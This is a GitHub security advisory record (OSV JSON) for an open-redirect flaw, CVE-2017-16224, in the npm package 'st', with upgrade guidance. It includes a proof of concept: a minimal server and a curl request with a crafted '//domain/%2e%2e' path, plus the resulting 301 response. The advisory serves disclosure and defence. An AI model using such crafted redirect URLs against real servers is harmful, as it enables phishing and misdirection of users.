{"id":"GHSA-72fg-jqhx-c68p","summary":"Open Redirect in st","details":"st is a module for serving static files.\n\nAn attacker is able to craft a request that results in an `HTTP 301` (redirect) to an entirely different domain. \n\nA request for: `http://some.server.com//nodesecurity.org/%2e%2e` would result in a 301 to `//nodesecurity.org/%2e%2e` which most browsers treat as a proper redirect as `//` is translated into the current schema being used.\n\n**Mitigating factor:** \n\nIn order for this to work, `st` must be serving from the root of a server (`/`) rather than the typical sub directory (`/static/`) and the redirect URL will end with some form of URL encoded `..` (\"%2e%2e\", \"%2e.\", \".%2e\"). \n\nCode example (provided by Xin Gao): \n\n[example.js]\n\n```js\nvar st = require('st') \nvar http = require('http') \nhttp.createServer(st(process.cwd())).listen(1337)\n```\n\n```shell\n$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e\n*   Trying ::1...\n* TCP_NODELAY set\n* Connected to localhost (::1) port 1337 (#0)\n\u003e GET //cve.mitre.com/%2e%2e HTTP/1.1\n\u003e Host: localhost:1337\n\u003e User-Agent: curl/7.54.0\n\u003e Accept: */*\n\u003e\n\u003c HTTP/1.1 301 Moved Permanently\n\u003c cache-control: public, max-age=600\n\u003c last-modified: Fri, 13 Oct 2017 22:56:33 GMT\n\u003c etag: \"16777220-46488904-1507935393000\"\n\u003c location: //cve.mitre.com/%2e%2e/\n\u003c Date: Fri, 13 Oct 2017 22:56:41 GMT\n\u003c Connection: keep-alive\n\u003c Content-Length: 30\n\u003c\n* Connection #0 to host localhost left intact\n```\n\n\n## Recommendation\n\nUpdate to version 1.2.2 or later.","aliases":["CVE-2017-16224"],"modified":"2023-11-08T03:59:12.445573Z","published":"2018-08-06T21:33:31Z","database_specific":{"github_reviewed_at":"2020-06-16T21:20:52Z","nvd_published_at":null,"cwe_ids":["CWE-601"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2017-16224"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-72fg-jqhx-c68p"},{"type":"WEB","url":"https://www.npmjs.com/advisories/547"}],"affected":[{"package":{"name":"st","ecosystem":"npm","purl":"pkg:npm/st"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.2.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-72fg-jqhx-c68p/GHSA-72fg-jqhx-c68p.json","last_known_affected_version_range":"\u003c= 1.2.1"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}]}